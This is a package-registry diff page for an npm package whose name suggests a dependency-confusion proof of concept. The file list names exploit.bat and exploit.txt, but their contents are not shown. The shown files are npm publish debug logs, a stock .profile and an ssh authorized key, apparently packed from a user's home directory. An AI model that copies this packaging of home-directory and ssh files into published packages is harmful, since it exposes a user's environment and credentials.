npm - myconfusedfunctionpoctestpackage - Versions diffs - 0.0.1-security → 1.0.7 - Mend

myconfusedfunctionpoctestpackage 0.0.1-security → 1.0.7

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of myconfusedfunctionpoctestpackage might be problematic. Click here for more details.

Files changed (29) hide show

package/.bash_history +363 -0
package/.bash_logout +7 -0
package/.bashrc +117 -0
package/.cache/motd.legal-displayed +0 -0
package/.lesshst +1 -0
package/.npm/_cacache/content-v2/sha512/73/f2/a8b067e1e36ff8fe9d0f369ef72b81f9d9a5f8794df5ca1ad5565ebf4c46f11af491ec09b9681f91595df70fbc775be8cb1d0ec47de07cac633cf5acae7a +0 -0
package/.npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70 +2 -0
package/.npm/_logs/2025-02-24T18_33_08_819Z-debug-0.log +94 -0
package/.npm/_logs/2025-02-24T18_43_29_748Z-debug-0.log +115 -0
package/.npm/_logs/2025-02-24T18_44_14_248Z-debug-0.log +96 -0
package/.npm/_logs/2025-02-24T19_00_04_898Z-debug-0.log +97 -0
package/.npm/_logs/2025-02-24T19_33_20_796Z-debug-0.log +98 -0
package/.npm/_logs/2025-02-24T19_52_14_957Z-debug-0.log +116 -0
package/.npm/_logs/2025-02-24T20_26_20_665Z-debug-0.log +116 -0
package/.npm/_logs/2025-02-24T20_27_50_313Z-debug-0.log +117 -0
package/.npm/_logs/2025-02-24T20_33_02_781Z-debug-0.log +38 -0
package/.npm/_logs/2025-02-24T20_33_07_656Z-debug-0.log +80 -0
package/.npm/_logs/2025-02-24T20_43_08_949Z-debug-0.log +35 -0
package/.npm/_update-notifier-last-checked +0 -0
package/.profile +27 -0
package/.ssh/authorized_keys +1 -0
package/.ssh/known_hosts +1 -0
package/.sudo_as_admin_successful +0 -0
package/base.ldif +13 -0
package/exploit.bat +1 -0
package/exploit.txt +26 -0
package/package.json +10 -4
package/package.json.save +12 -0
package/README.md +0 -5

package/.npm/_logs/2025-02-24T20_26_20_665Z-debug-0.log ADDED Viewed

@@ -0,0 +1,116 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 1ms
+4 timing config:load:defaults Completed in 4ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 9ms
+6 timing config:load:builtin Completed in 9ms
+7 timing config:load:cli Completed in 4ms
+8 timing config:load:env Completed in 1ms
+9 timing config:load:project Completed in 2ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 1ms
+11 timing config:load:user Completed in 1ms
+12 timing config:load:file:/etc/npmrc Completed in 0ms
+13 timing config:load:global Completed in 1ms
+14 timing config:load:setEnvs Completed in 1ms
+15 timing config:load Completed in 25ms
+16 timing npm:load:configload Completed in 26ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 0ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 3ms
+22 timing config:load:flatten Completed in 8ms
+23 timing npm:load:display Completed in 13ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-24T20_26_20_665Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-02-24T20_26_20_665Z-debug-0.log
+26 timing npm:load:logFile Completed in 14ms
+27 timing npm:load:timers Completed in 1ms
+28 timing npm:load:configScope Completed in 0ms
+29 timing npm:load Completed in 58ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 0ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 1ms
+35 notice
+36 notice 📦  myconfusedfunctionpoctestpackage@1.0.6
+37 notice === Tarball Contents ===
+38 notice 11.4kB  .bash_history
+38 notice 220B    .bash_logout
+38 notice 3.8kB   .bashrc
+38 notice 0B      .cache/motd.legal-displayed
+38 notice 20B     .lesshst
+38 notice 13B     .npm/_cacache/_lastverified
+38 notice 2.5MB   .npm/_cacache/content-v2/sha512/2b/8d/f5e0be167473e14564798f422c3a07aca9a7cc41123816901c6b7150a284596ac8b46a84458e2a3f4feeaf5ffb433e2305dc4639ce88a5414a6559b12e4c
+38 notice 160.8MB .npm/_cacache/content-v2/sha512/03/ef/e67cdcf3ac2915134a8a9f7e834a73044e272badcdc2708f0e4245fd614b0e42ce42202a86557483b277ff2bec5e3c4dfe7433bd47dd4b8f5fd345cda68d
+38 notice 39.0kB  .npm/_cacache/content-v2/sha512/3d/2e/8f404043bf46e458a2dedf19a4ec74d8c379005727ea5eaf44a88e430d0bccdfcb2c6e00c5069d6a1c3eb28fe804672f788196e273ac5c612783f940115a
+38 notice 5.0MB   .npm/_cacache/content-v2/sha512/4d/35/4b7507526f1be5d61c6a08bd64eac7bd940ab53f1bef53f68169fed40e2c0162963edccee6ce24bc742bbc81c2b64de00c8fc61289284aea49ea53b2318e
+38 notice 304.5kB .npm/_cacache/content-v2/sha512/8b/7c/d086052fa89b371cff7fbdd2db6a7ff6cc2294ad6fc560c1e9bcd5797b1626f85785b31cbca5a7bb00db53e75d974d09eee786a6be65f25c9a720889165d
+38 notice 1.3MB   .npm/_cacache/content-v2/sha512/8d/a1/fc39c0ada87d88459d33d72b6189fcef1be8ac5d4f41cca8eaac29543ed4dd12f36ea2dd7d6c462938b62e776195d3d574f3ac8e45a6a0a9e51b449bd98a
+38 notice 80.4MB  .npm/_cacache/content-v2/sha512/12/ec/e14fec64bc11d32c381e76d5caf1ad6a1bf397bcf666aec686cbef769ce198cba039637fa9cd63fc2fd3ce41c89ac5ed5eb53ee19c8ecf5b9bc053bb7318
+38 notice 40.2MB  .npm/_cacache/content-v2/sha512/51/c1/4b14746e5a667c16649c8100ab06b8122f0a1d6be0d62f40d7b67a6bfff3dcd5e630c933abc5e08b1330d643af2b17c7b638accc74b791125ff93d16bb0d
+38 notice 159.6kB .npm/_cacache/content-v2/sha512/73/24/ab22de871b58c47a962ece82193f224b6c57154bb808c59d9a2777c83807630329ce5d921fec115c0e26c5700f50b2b0b93b1ef7ec3cf86e99e921dc59a6
+38 notice 8.4kB   .npm/_cacache/content-v2/sha512/74/96/98bc622eb555e919675c2646628d2154adaa2678bcb5e31eb5a3cc1e2599f9c987440cfcf6bbeacd071b9c05091c4fd92b92680df20baf4c1d9d14a61979
+38 notice 27B     .npm/_cacache/content-v2/sha512/76/24/0207b71e6fed0a8a0d7a6a0c28b3f5ad32122a5227fe9edbb7f0f9fd6dfdefc9529dfc8cc25004f41ac24cc7d36a8412e5216dd0ef1189e3ef13b4ba32e1
+38 notice 10.0MB  .npm/_cacache/content-v2/sha512/b9/17/7978861a36cfa98123dddd9662d73d3660caae535f6c33648f9d5b6c33375706cbfcd6be353a3a6580133122c3eecadd0769ccec8155bbda141890dff3b9
+38 notice 626.7kB .npm/_cacache/content-v2/sha512/bc/16/4336822f515eab7926ef7c0a2635fe0609ea084b936ca9b0bbd3cd34389c23dc70a35e295f6c26571336691f462882d567b26061717b8d5fa0361884e4c6
+38 notice 79.1kB  .npm/_cacache/content-v2/sha512/cb/ee/a33fc813c6e16025cf6f1f8602668e53f85fd9120f022fb61e34b92f5ddc51badb5366281bbd752c6ab12068df9efaaabdd61f444b1cedf6300428aa4237
+38 notice 18.8kB  .npm/_cacache/content-v2/sha512/d4/f7/fd873ae3f46ecbf343cd0fc6b8c0563eddb31a624aeab26b59e00d60a76ee619c5c84d6fe74246f724e2332fba5bfadadb4fedd51fb9bf7305b4bcd4c05e
+38 notice 321.6MB .npm/_cacache/content-v2/sha512/ec/1d/0d110ff8e8aca93d9e139b3b2042633bffcc07f3a9949c48331dba5c018010f926692dc6e2bca23b2f4e99c8d148992518a5d930912f5912bd8373982420
+38 notice 20.1MB  .npm/_cacache/content-v2/sha512/f2/78/030caf031bef365d63827597e81386fea5bafb3cbaa83beafd146af1cb365203f44f1b65a365b8b9d9f23766cc34547b686813fe7a34dc81b70adb55e70e
+38 notice 495B    .npm/_cacache/index-v5/9a/5d/18b734f038b4b4e0f36a1c1d9c852b951409916ab3205e88ac3cab28e02b
+38 notice 3.7kB   .npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70
+38 notice 9.2kB   .npm/_logs/2025-02-20T18_28_42_136Z-debug-0.log
+38 notice 9.4kB   .npm/_logs/2025-02-20T19_17_02_081Z-debug-0.log
+38 notice 9.5kB   .npm/_logs/2025-02-20T20_52_34_261Z-debug-0.log
+38 notice 9.7kB   .npm/_logs/2025-02-20T20_58_34_147Z-debug-0.log
+38 notice 9.9kB   .npm/_logs/2025-02-24T18_33_08_819Z-debug-0.log
+38 notice 11.5kB  .npm/_logs/2025-02-24T18_43_29_748Z-debug-0.log
+38 notice 10.2kB  .npm/_logs/2025-02-24T18_44_14_248Z-debug-0.log
+38 notice 10.4kB  .npm/_logs/2025-02-24T19_00_04_898Z-debug-0.log
+38 notice 10.6kB  .npm/_logs/2025-02-24T19_33_20_796Z-debug-0.log
+38 notice 12.0kB  .npm/_logs/2025-02-24T19_52_14_957Z-debug-0.log
+38 notice 1.7kB   .npm/_logs/2025-02-24T20_26_20_665Z-debug-0.log
+38 notice 0B      .npm/_update-notifier-last-checked
+38 notice 807B    .profile
+38 notice 100B    .ssh/authorized_keys
+38 notice 142B    .ssh/known_hosts
+38 notice 0B      .sudo_as_admin_successful
+38 notice 327B    base.ldif
+38 notice 377B    exploit.bat
+38 notice 3.8kB   exploit.txt
+38 notice 356B    package.json
+38 notice 289B    package.json.save
+39 notice === Tarball Details ===
+40 notice name:          myconfusedfunctionpoctestpackage
+40 notice version:       1.0.6
+40 notice filename:      myconfusedfunctionpoctestpackage-1.0.6.tgz
+40 notice package size:  643.3 MB
+40 notice unpacked size: 643.3 MB
+40 notice shasum:        8890ca403e75fdd27107cef937c654e6a64e4b55
+40 notice integrity:     sha512-m+o+zY8xRmMQs[...]k/EYE5xbirsoA==
+40 notice total files:   46
+41 notice
+42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
+43 timing command:publish Completed in 43649ms
+44 verbose stack Error: Cannot create a string longer than 0x1fffffe8 characters
+44 verbose stack     at Object.slice (node:buffer:687:37)
+44 verbose stack     at Buffer.toString (node:buffer:857:14)
+44 verbose stack     at buildMetadata (/usr/share/nodejs/libnpmpublish/lib/publish.js:129:23)
+44 verbose stack     at publish (/usr/share/nodejs/libnpmpublish/lib/publish.js:39:20)
+44 verbose stack     at /usr/share/nodejs/npm/lib/commands/publish.js:126:46
+44 verbose stack     at otplease (/usr/share/nodejs/npm/lib/utils/otplease.js:4:18)
+44 verbose stack     at Publish.exec (/usr/share/nodejs/npm/lib/commands/publish.js:126:13)
+44 verbose stack     at async module.exports (/usr/share/nodejs/npm/lib/cli.js:133:5)
+45 verbose cwd /home/bigibson
+46 verbose Linux 6.8.0-1021-azure
+47 verbose node v18.19.1
+48 verbose npm  v9.2.0
+49 error code ERR_STRING_TOO_LONG
+50 error Cannot create a string longer than 0x1fffffe8 characters
+51 verbose exit 1
+52 timing npm Completed in 43758ms
+53 verbose code 1
+54 error A complete log of this run can be found in:
+54 error     /home/bigibson/.npm/_logs/2025-02-24T20_26_20_665Z-debug-0.log

package/.npm/_logs/2025-02-24T20_27_50_313Z-debug-0.log ADDED Viewed

@@ -0,0 +1,117 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 0ms
+4 timing config:load:defaults Completed in 3ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 4ms
+6 timing config:load:builtin Completed in 4ms
+7 timing config:load:cli Completed in 4ms
+8 timing config:load:env Completed in 1ms
+9 timing config:load:project Completed in 2ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 1ms
+11 timing config:load:user Completed in 1ms
+12 timing config:load:file:/etc/npmrc Completed in 1ms
+13 timing config:load:global Completed in 1ms
+14 timing config:load:setEnvs Completed in 2ms
+15 timing config:load Completed in 18ms
+16 timing npm:load:configload Completed in 19ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 0ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 2ms
+22 timing config:load:flatten Completed in 7ms
+23 timing npm:load:display Completed in 12ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-24T20_27_50_313Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-02-24T20_27_50_313Z-debug-0.log
+26 timing npm:load:logFile Completed in 14ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 0ms
+29 timing npm:load Completed in 50ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 1ms
+35 notice
+36 notice 📦  myconfusedfunctionpoctestpackage@1.0.6
+37 notice === Tarball Contents ===
+38 notice 11.4kB  .bash_history
+38 notice 220B    .bash_logout
+38 notice 3.8kB   .bashrc
+38 notice 0B      .cache/motd.legal-displayed
+38 notice 20B     .lesshst
+38 notice 13B     .npm/_cacache/_lastverified
+38 notice 2.5MB   .npm/_cacache/content-v2/sha512/2b/8d/f5e0be167473e14564798f422c3a07aca9a7cc41123816901c6b7150a284596ac8b46a84458e2a3f4feeaf5ffb433e2305dc4639ce88a5414a6559b12e4c
+38 notice 160.8MB .npm/_cacache/content-v2/sha512/03/ef/e67cdcf3ac2915134a8a9f7e834a73044e272badcdc2708f0e4245fd614b0e42ce42202a86557483b277ff2bec5e3c4dfe7433bd47dd4b8f5fd345cda68d
+38 notice 39.0kB  .npm/_cacache/content-v2/sha512/3d/2e/8f404043bf46e458a2dedf19a4ec74d8c379005727ea5eaf44a88e430d0bccdfcb2c6e00c5069d6a1c3eb28fe804672f788196e273ac5c612783f940115a
+38 notice 5.0MB   .npm/_cacache/content-v2/sha512/4d/35/4b7507526f1be5d61c6a08bd64eac7bd940ab53f1bef53f68169fed40e2c0162963edccee6ce24bc742bbc81c2b64de00c8fc61289284aea49ea53b2318e
+38 notice 304.5kB .npm/_cacache/content-v2/sha512/8b/7c/d086052fa89b371cff7fbdd2db6a7ff6cc2294ad6fc560c1e9bcd5797b1626f85785b31cbca5a7bb00db53e75d974d09eee786a6be65f25c9a720889165d
+38 notice 1.3MB   .npm/_cacache/content-v2/sha512/8d/a1/fc39c0ada87d88459d33d72b6189fcef1be8ac5d4f41cca8eaac29543ed4dd12f36ea2dd7d6c462938b62e776195d3d574f3ac8e45a6a0a9e51b449bd98a
+38 notice 643.3MB .npm/_cacache/content-v2/sha512/9b/ea/3ecd8f31466310b2aa002351490a474430ad34bede5e534bd2e32d2d2e8e2b00ecf8d1b69e01940571ade746527c762a42463196464fc4604e716e2aeca0
+38 notice 80.4MB  .npm/_cacache/content-v2/sha512/12/ec/e14fec64bc11d32c381e76d5caf1ad6a1bf397bcf666aec686cbef769ce198cba039637fa9cd63fc2fd3ce41c89ac5ed5eb53ee19c8ecf5b9bc053bb7318
+38 notice 40.2MB  .npm/_cacache/content-v2/sha512/51/c1/4b14746e5a667c16649c8100ab06b8122f0a1d6be0d62f40d7b67a6bfff3dcd5e630c933abc5e08b1330d643af2b17c7b638accc74b791125ff93d16bb0d
+38 notice 159.6kB .npm/_cacache/content-v2/sha512/73/24/ab22de871b58c47a962ece82193f224b6c57154bb808c59d9a2777c83807630329ce5d921fec115c0e26c5700f50b2b0b93b1ef7ec3cf86e99e921dc59a6
+38 notice 8.4kB   .npm/_cacache/content-v2/sha512/74/96/98bc622eb555e919675c2646628d2154adaa2678bcb5e31eb5a3cc1e2599f9c987440cfcf6bbeacd071b9c05091c4fd92b92680df20baf4c1d9d14a61979
+38 notice 27B     .npm/_cacache/content-v2/sha512/76/24/0207b71e6fed0a8a0d7a6a0c28b3f5ad32122a5227fe9edbb7f0f9fd6dfdefc9529dfc8cc25004f41ac24cc7d36a8412e5216dd0ef1189e3ef13b4ba32e1
+38 notice 10.0MB  .npm/_cacache/content-v2/sha512/b9/17/7978861a36cfa98123dddd9662d73d3660caae535f6c33648f9d5b6c33375706cbfcd6be353a3a6580133122c3eecadd0769ccec8155bbda141890dff3b9
+38 notice 626.7kB .npm/_cacache/content-v2/sha512/bc/16/4336822f515eab7926ef7c0a2635fe0609ea084b936ca9b0bbd3cd34389c23dc70a35e295f6c26571336691f462882d567b26061717b8d5fa0361884e4c6
+38 notice 79.1kB  .npm/_cacache/content-v2/sha512/cb/ee/a33fc813c6e16025cf6f1f8602668e53f85fd9120f022fb61e34b92f5ddc51badb5366281bbd752c6ab12068df9efaaabdd61f444b1cedf6300428aa4237
+38 notice 18.8kB  .npm/_cacache/content-v2/sha512/d4/f7/fd873ae3f46ecbf343cd0fc6b8c0563eddb31a624aeab26b59e00d60a76ee619c5c84d6fe74246f724e2332fba5bfadadb4fedd51fb9bf7305b4bcd4c05e
+38 notice 321.6MB .npm/_cacache/content-v2/sha512/ec/1d/0d110ff8e8aca93d9e139b3b2042633bffcc07f3a9949c48331dba5c018010f926692dc6e2bca23b2f4e99c8d148992518a5d930912f5912bd8373982420
+38 notice 20.1MB  .npm/_cacache/content-v2/sha512/f2/78/030caf031bef365d63827597e81386fea5bafb3cbaa83beafd146af1cb365203f44f1b65a365b8b9d9f23766cc34547b686813fe7a34dc81b70adb55e70e
+38 notice 495B    .npm/_cacache/index-v5/9a/5d/18b734f038b4b4e0f36a1c1d9c852b951409916ab3205e88ac3cab28e02b
+38 notice 3.9kB   .npm/_cacache/index-v5/ae/c1/794477315825298db9ca27dfd950e963043ec553246545524bbab48a0c70
+38 notice 9.4kB   .npm/_logs/2025-02-20T19_17_02_081Z-debug-0.log
+38 notice 9.5kB   .npm/_logs/2025-02-20T20_52_34_261Z-debug-0.log
+38 notice 9.7kB   .npm/_logs/2025-02-20T20_58_34_147Z-debug-0.log
+38 notice 9.9kB   .npm/_logs/2025-02-24T18_33_08_819Z-debug-0.log
+38 notice 11.5kB  .npm/_logs/2025-02-24T18_43_29_748Z-debug-0.log
+38 notice 10.2kB  .npm/_logs/2025-02-24T18_44_14_248Z-debug-0.log
+38 notice 10.4kB  .npm/_logs/2025-02-24T19_00_04_898Z-debug-0.log
+38 notice 10.6kB  .npm/_logs/2025-02-24T19_33_20_796Z-debug-0.log
+38 notice 12.0kB  .npm/_logs/2025-02-24T19_52_14_957Z-debug-0.log
+38 notice 11.9kB  .npm/_logs/2025-02-24T20_26_20_665Z-debug-0.log
+38 notice 1.7kB   .npm/_logs/2025-02-24T20_27_50_313Z-debug-0.log
+38 notice 0B      .npm/_update-notifier-last-checked
+38 notice 807B    .profile
+38 notice 100B    .ssh/authorized_keys
+38 notice 142B    .ssh/known_hosts
+38 notice 0B      .sudo_as_admin_successful
+38 notice 327B    base.ldif
+38 notice 377B    exploit.bat
+38 notice 3.8kB   exploit.txt
+38 notice 356B    package.json
+38 notice 289B    package.json.save
+39 notice === Tarball Details ===
+40 notice name:          myconfusedfunctionpoctestpackage
+40 notice version:       1.0.6
+40 notice filename:      myconfusedfunctionpoctestpackage-1.0.6.tgz
+40 notice package size:  1.3 GB
+40 notice unpacked size: 1.3 GB
+40 notice shasum:        c22830757c2bbed2128ee148f3f18bfc1295b5b8
+40 notice integrity:     sha512-uru4ft7N1bklW[...]mHEhFUx14nStw==
+40 notice total files:   47
+41 notice
+42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
+43 timing command:publish Completed in 114252ms
+44 verbose stack Error: Cannot create a string longer than 0x1fffffe8 characters
+44 verbose stack     at Object.slice (node:buffer:687:37)
+44 verbose stack     at Buffer.toString (node:buffer:857:14)
+44 verbose stack     at buildMetadata (/usr/share/nodejs/libnpmpublish/lib/publish.js:129:23)
+44 verbose stack     at publish (/usr/share/nodejs/libnpmpublish/lib/publish.js:39:20)
+44 verbose stack     at /usr/share/nodejs/npm/lib/commands/publish.js:126:46
+44 verbose stack     at otplease (/usr/share/nodejs/npm/lib/utils/otplease.js:4:18)
+44 verbose stack     at Publish.exec (/usr/share/nodejs/npm/lib/commands/publish.js:126:13)
+44 verbose stack     at async module.exports (/usr/share/nodejs/npm/lib/cli.js:133:5)
+45 verbose cwd /home/bigibson
+46 verbose Linux 6.8.0-1021-azure
+47 verbose node v18.19.1
+48 verbose npm  v9.2.0
+49 error code ERR_STRING_TOO_LONG
+50 error Cannot create a string longer than 0x1fffffe8 characters
+51 verbose exit 1
+52 timing npm Completed in 114392ms
+53 verbose code 1
+54 error A complete log of this run can be found in:
+54 error     /home/bigibson/.npm/_logs/2025-02-24T20_27_50_313Z-debug-0.log

package/.npm/_logs/2025-02-24T20_33_02_781Z-debug-0.log ADDED Viewed

@@ -0,0 +1,38 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 1ms
+4 timing config:load:defaults Completed in 4ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 4ms
+6 timing config:load:builtin Completed in 4ms
+7 timing config:load:cli Completed in 3ms
+8 timing config:load:env Completed in 0ms
+9 timing config:load:project Completed in 4ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 1ms
+11 timing config:load:user Completed in 1ms
+12 timing config:load:file:/etc/npmrc Completed in 0ms
+13 timing config:load:global Completed in 0ms
+14 timing config:load:setEnvs Completed in 2ms
+15 timing config:load Completed in 21ms
+16 timing npm:load:configload Completed in 21ms
+17 timing npm:load:mkdirpcache Completed in 1ms
+18 timing npm:load:mkdirplogs Completed in 0ms
+19 verbose title npm cache clean
+20 verbose argv "cache" "clean" "--force"
+21 timing npm:load:setTitle Completed in 3ms
+22 timing config:load:flatten Completed in 7ms
+23 timing npm:load:display Completed in 8ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-24T20_33_02_781Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-02-24T20_33_02_781Z-debug-0.log
+26 timing npm:load:logFile Completed in 17ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 0ms
+29 warn using --force Recommended protections disabled.
+30 timing npm:load Completed in 56ms
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing command:cache Completed in 112ms
+35 verbose exit 0
+36 timing npm Completed in 188ms
+37 info ok

package/.npm/_logs/2025-02-24T20_33_07_656Z-debug-0.log ADDED Viewed

@@ -0,0 +1,80 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 1ms
+4 timing config:load:defaults Completed in 3ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 4ms
+6 timing config:load:builtin Completed in 4ms
+7 timing config:load:cli Completed in 4ms
+8 timing config:load:env Completed in 0ms
+9 timing config:load:project Completed in 1ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 1ms
+11 timing config:load:user Completed in 1ms
+12 timing config:load:file:/etc/npmrc Completed in 1ms
+13 timing config:load:global Completed in 1ms
+14 timing config:load:setEnvs Completed in 2ms
+15 timing config:load Completed in 17ms
+16 timing npm:load:configload Completed in 18ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 1ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 4ms
+22 timing config:load:flatten Completed in 7ms
+23 timing npm:load:display Completed in 12ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-24T20_33_07_656Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-02-24T20_33_07_656Z-debug-0.log
+26 timing npm:load:logFile Completed in 15ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 0ms
+29 timing npm:load Completed in 52ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 1ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 1ms
+35 notice
+36 notice 📦  myconfusedfunctionpoctestpackage@1.0.6
+37 notice === Tarball Contents ===
+38 notice 11.4kB .bash_history
+38 notice 220B   .bash_logout
+38 notice 3.8kB  .bashrc
+38 notice 0B     .cache/motd.legal-displayed
+38 notice 20B    .lesshst
+38 notice 9.7kB  .npm/_logs/2025-02-20T20_58_34_147Z-debug-0.log
+38 notice 9.9kB  .npm/_logs/2025-02-24T18_33_08_819Z-debug-0.log
+38 notice 11.5kB .npm/_logs/2025-02-24T18_43_29_748Z-debug-0.log
+38 notice 10.2kB .npm/_logs/2025-02-24T18_44_14_248Z-debug-0.log
+38 notice 10.4kB .npm/_logs/2025-02-24T19_00_04_898Z-debug-0.log
+38 notice 10.6kB .npm/_logs/2025-02-24T19_33_20_796Z-debug-0.log
+38 notice 12.0kB .npm/_logs/2025-02-24T19_52_14_957Z-debug-0.log
+38 notice 11.9kB .npm/_logs/2025-02-24T20_26_20_665Z-debug-0.log
+38 notice 12.1kB .npm/_logs/2025-02-24T20_27_50_313Z-debug-0.log
+38 notice 1.7kB  .npm/_logs/2025-02-24T20_33_02_781Z-debug-0.log
+38 notice 1.7kB  .npm/_logs/2025-02-24T20_33_07_656Z-debug-0.log
+38 notice 0B     .npm/_update-notifier-last-checked
+38 notice 807B   .profile
+38 notice 100B   .ssh/authorized_keys
+38 notice 142B   .ssh/known_hosts
+38 notice 0B     .sudo_as_admin_successful
+38 notice 327B   base.ldif
+38 notice 377B   exploit.bat
+38 notice 3.8kB  exploit.txt
+38 notice 356B   package.json
+38 notice 289B   package.json.save
+39 notice === Tarball Details ===
+40 notice name:          myconfusedfunctionpoctestpackage
+40 notice version:       1.0.6
+40 notice filename:      myconfusedfunctionpoctestpackage-1.0.6.tgz
+40 notice package size:  13.4 kB
+40 notice unpacked size: 123.4 kB
+40 notice shasum:        f4ddd2c429fff84e2d1b4ebcbe03d47fe826e21a
+40 notice integrity:     sha512-c/KosGfh42/4/[...]eB8rGM89ayueg==
+40 notice total files:   26
+41 notice
+42 notice Publishing to https://registry.npmjs.org/ with tag latest and default access
+43 http fetch PUT 200 https://registry.npmjs.org/myconfusedfunctionpoctestpackage 1642ms
+44 timing command:publish Completed in 1887ms
+45 verbose exit 0
+46 timing npm Completed in 1974ms
+47 info ok

package/.npm/_logs/2025-02-24T20_43_08_949Z-debug-0.log ADDED Viewed

@@ -0,0 +1,35 @@
+0 verbose cli /usr/bin/node /usr/bin/npm
+1 info using npm@9.2.0
+2 info using node@v18.19.1
+3 timing npm:load:whichnode Completed in 0ms
+4 timing config:load:defaults Completed in 3ms
+5 timing config:load:file:/usr/share/nodejs/npm/npmrc Completed in 4ms
+6 timing config:load:builtin Completed in 4ms
+7 timing config:load:cli Completed in 3ms
+8 timing config:load:env Completed in 0ms
+9 timing config:load:project Completed in 2ms
+10 timing config:load:file:/home/bigibson/.npmrc Completed in 0ms
+11 timing config:load:user Completed in 1ms
+12 timing config:load:file:/etc/npmrc Completed in 1ms
+13 timing config:load:global Completed in 1ms
+14 timing config:load:setEnvs Completed in 2ms
+15 timing config:load Completed in 17ms
+16 timing npm:load:configload Completed in 17ms
+17 timing npm:load:mkdirpcache Completed in 0ms
+18 timing npm:load:mkdirplogs Completed in 0ms
+19 verbose title npm publish
+20 verbose argv "publish" "--scope" "public" "--loglevel" "verbose"
+21 timing npm:load:setTitle Completed in 3ms
+22 timing config:load:flatten Completed in 6ms
+23 timing npm:load:display Completed in 11ms
+24 verbose logfile logs-max:10 dir:/home/bigibson/.npm/_logs/2025-02-24T20_43_08_949Z-
+25 verbose logfile /home/bigibson/.npm/_logs/2025-02-24T20_43_08_949Z-debug-0.log
+26 timing npm:load:logFile Completed in 14ms
+27 timing npm:load:timers Completed in 0ms
+28 timing npm:load:configScope Completed in 1ms
+29 timing npm:load Completed in 47ms
+30 verbose publish [ '.' ]
+31 timing config:load:flatten Completed in 0ms
+32 silly logfile start cleaning logs, removing 1 files
+33 silly logfile done cleaning log files
+34 timing arborist:ctor Completed in 2ms

package/.npm/_update-notifier-last-checked ADDED Viewed

File without changes

package/.profile ADDED Viewed

@@ -0,0 +1,27 @@
+# ~/.profile: executed by the command interpreter for login shells.
+# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
+# exists.
+# see /usr/share/doc/bash/examples/startup-files for examples.
+# the files are located in the bash-doc package.
+# the default umask is set in /etc/profile; for setting the umask
+# for ssh logins, install and configure the libpam-umask package.
+#umask 022
+# if running bash
+if [ -n "$BASH_VERSION" ]; then
+    # include .bashrc if it exists
+    if [ -f "$HOME/.bashrc" ]; then
+	. "$HOME/.bashrc"
+    fi
+fi
+# set PATH so it includes user's private bin if it exists
+if [ -d "$HOME/bin" ] ; then
+    PATH="$HOME/bin:$PATH"
+fi
+# set PATH so it includes user's private bin if it exists
+if [ -d "$HOME/.local/bin" ] ; then
+    PATH="$HOME/.local/bin:$PATH"
+fi

package/.ssh/authorized_keys ADDED Viewed

	@@ -0,0 +1 @@
1	+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPq46DtywGDKH3HEWsTSAHMChzF4JdA12udtwRzMwFRw generated-by-azure

package/.ssh/known_hosts ADDED Viewed

	@@ -0,0 +1 @@
